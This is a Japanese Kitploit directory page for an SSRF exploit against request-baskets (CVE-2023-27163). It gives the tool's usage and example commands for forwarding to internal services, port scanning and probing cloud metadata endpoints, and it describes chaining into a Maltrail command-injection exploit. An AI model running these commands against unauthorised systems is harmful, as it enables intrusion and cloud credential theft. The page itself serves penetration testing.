Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-27163-exploit — CVE-2023-27163におけるrequest-basketsのSSRFエクスプロイト。悪意のあるバスケット転送を介して、内部ポートスキャン、クラウドメタデータ調査、サービス検出を可能にします。 | Kitploit
ツール/GitHubGitHub/jeanback1/cve-2023-27163-exploit
偵察ポートスキャン脆弱性分析エクスプロイトウェブアプリケーション悪用クラウドセキュリティ
GitHubjeanback1/cve-2023-27163-exploit

CVE-2023-27163-exploit

CVE-2023-27163におけるrequest-basketsのSSRFエクスプロイト。悪意のあるバスケット転送を介して、内部ポートスキャン、クラウドメタデータ調査、サービス検出を可能にします。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-27163 — request-baskets SSRF エクスプロイト

このエクスプロイトは、request-baskets バージョン ≤ 1.2.1 で見つかった Server-Side Request Forgery (SSRF) 脆弱性である CVE-2023-27163 を標的とするために作成しました。この脆弱性は /api/baskets/{name} エンドポイントに存在し、forward_url パラメータにより攻撃者がサーバーに任意の HTTP リクエストを代理発行させることができます。

仕組み

エクスプロイトは、内部ターゲットを指す forward_url で構成された悪意のある「バスケット」を作成します。そのバスケットのエンドポイントへのリクエストは、サーバーによって指定された URL に転送され、実質的にサーバーを SSRF プロキシとして機能させます。

機能

  • 任意の内部または外部 URL への SSRF リクエスト転送
  • HTTP プローブによる内部ホストのポートスキャン
  • クラウドメタデータエンドポイントのプロービング (AWS, GCP, Azure, DigitalOcean, Alibaba)
  • 一般的な内部サービスのディスカバリ
  • 設定可能なバスケットプロファイル (proxy, insecure TLS, path expansion)

必要条件

  • Python 3.6+
  • requests ライブラリ (pip install requests)

使用方法

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-f FORWARD_URL] [--proxy-response]
                  [--insecure-tls] [--no-expand-path] [--capacity CAPACITY]
                  [--scan-host SCAN_HOST] [--ports PORTS] [--scan]
                  [--discover] [--cloud-metadata] [--timeout TIMEOUT]
                  [--delay DELAY]

例

root@kitploit:~
# 内部サービスへの基本的なSSRF転送
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80/admin

# 内部ホストのポートスキャン
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 127.0.0.1 --scan

# クラウドメタデータエンドポイントのプロービング
python3 exploit.py -t http://192.168.1.100:55555 --cloud-metadata

# プロキシモード(転送されたレスポンスボディを返す)
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80 --proxy-response

# カスタムポート範囲のスキャン
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 10.0.0.2 \
         --ports 80,443,3000,5000,8000,8080,9000

免責事項

このツールは教育目的および許可されたセキュリティテストのために作成しました。明示的な許可なしにシステムに対して使用しないでください。


関連ツール

この SSRF エクスプロイトは、直接公開されていない内部サービスに到達するための最初のエントリポイントとして使用できます。これは Maltrail-v0.53-Exploit と連携するように設計されています。SSRF トンネルにより、localhost 上で動作する Maltrail インスタンスに到達し、それを介してコマンドインジェクションをトリガーできます。

CVE-2023-27163-exploit

ツールをダウンロード